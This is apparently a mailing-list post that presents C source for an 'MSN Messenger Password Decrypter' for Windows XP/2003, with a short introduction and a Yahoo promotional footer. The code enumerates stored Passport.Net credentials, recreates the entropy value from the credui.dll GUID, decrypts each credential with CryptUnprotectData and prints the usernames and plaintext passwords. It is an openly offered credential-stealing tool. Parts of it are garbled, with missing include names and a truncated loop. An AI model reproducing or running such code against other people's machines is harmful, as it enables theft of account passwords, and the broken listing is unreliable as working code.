MSN Messenger uses Windows Credential UI [credui.dll] on WinXP/2003. Password-Storage mechanism differs in these OSes so, the code posted by tombkeeper [http://xfocus.net/articles/200408/726.html] doesn't seem to work anymore on my OS atleast. Also, a 'entropy' value has been thrown, which is based on credui.dll GUID. So, here is the code that fullfils the same purpose - but surely works on my OS [WinXP SP2] :) /--- Start-Code --/ /* * MSN Messenger Password Decrypter for Windows XP & 2003 * (Compiled-VC++ 7.0, tested on WinXP SP2, MSN Messenger 7.0) * - Gregory R. Panakkal * http://www.crapware.tk/ * http://www.infogreg.com/ */ #include #include #include #pragma comment(lib, "Crypt32.lib") //Following definitions taken from wincred.h //[available only in Oct 2002 MS Platform SDK / LCC-Win32 Includes] typedef struct _CREDENTIAL_ATTRIBUTEA { LPSTR Keyword; DWORD Flags; DWORD ValueSize; LPBYTE Value; } CREDENTIAL_ATTRIBUTEA,*PCREDENTIAL_ATTRIBUTEA; typedef struct _CREDENTIALA { DWORD Flags; DWORD Type; LPSTR TargetName; LPSTR Comment; FILETIME LastWritten; DWORD CredentialBlobSize; LPBYTE CredentialBlob; DWORD Persist; DWORD AttributeCount; PCREDENTIAL_ATTRIBUTEA Attributes; LPSTR TargetAlias; LPSTR UserName; } CREDENTIALA,*PCREDENTIALA; typedef CREDENTIALA CREDENTIAL; typedef PCREDENTIALA PCREDENTIAL; //////////////////////////////////////////////////////////////////// typedef BOOL (WINAPI *typeCredEnumerateA)(LPCTSTR, DWORD, DWORD *, PCREDENTIALA **); typedef BOOL (WINAPI *typeCredReadA)(LPCTSTR, DWORD, DWORD, PCREDENTIALA *); typedef VOID (WINAPI *typeCredFree)(PVOID); typeCredEnumerateA pfCredEnumerateA; typeCredReadA pfCredReadA; typeCredFree pfCredFree; //////////////////////////////////////////////////////////////////// void showBanner() { printf("MSN Messenger Password Decrypter for Windows XP/2003\n"); printf(" - Gregory R. Panakkal, http://www.infogreg.com \n\n"); } //////////////////////////////////////////////////////////////////// int main() { PCREDENTIAL *CredentialCollection = NULL; DATA_BLOB blobCrypt, blobPlainText, blobEntropy; //used for filling up blobEntropy char szEntropyStringSeed[37] = "82BD0E67-9FEA-4748-8672-D5EFE5B779B0"; //credui.dll short int EntropyData[37]; short int tmp; HMODULE hDLL; DWORD Count, i; showBanner(); //Locate CredEnumerate, CredRead, CredFree from advapi32.dll if( hDLL = LoadLibrary("advapi32.dll") ) { pfCredEnumerateA = (typeCredEnumerateA)GetProcAddress(hDLL, "CredEnumerateA"); pfCredReadA = (typeCredReadA)GetProcAddress(hDLL, "CredReadA"); pfCredFree = (typeCredFree)GetProcAddress(hDLL, "CredFree"); if( pfCredEnumerateA == NULL|| pfCredReadA == NULL || pfCredFree == NULL ) { printf("error!\n"); return -1; } } //Get an array of 'credential', satisfying the filter pfCredEnumerateA("Passport.Net\\*", 0, &Count, &CredentialCollection); if( Count ) //usually this value is only 1 { //Calculate Entropy Data for(i=0; i<37; i++) // strlen(szEntropyStringSeed) = 37 { tmp = (short int)szEntropyStringSeed[i]; tmp <<= 2; EntropyData[i] = tmp; } for(i=0; iCredentialBlob; blobCrypt.cbData = CredentialCollection[i]->CredentialBlobSize; CryptUnprotectData(&blobCrypt, NULL, &blobEntropy, NULL, NULL, 1, &blobPlainText); printf("Username : %s\n", CredentialCollection[i]->UserName); printf("Password : %ls\n\n", blobPlainText.pbData); } } pfCredFree(CredentialCollection); } /--- End-Code --/ URL : http://www.infogreg.com/source-code/gpl/msn-messenger-password-decrypter-for-windows-xp-and-2003.html rgds, Gregory R. Panakkal ____________________________________________________ Send a rakhi to your brother, buy gifts and win attractive prizes. Log on to http://in.promos.yahoo.com/rakhi/index.html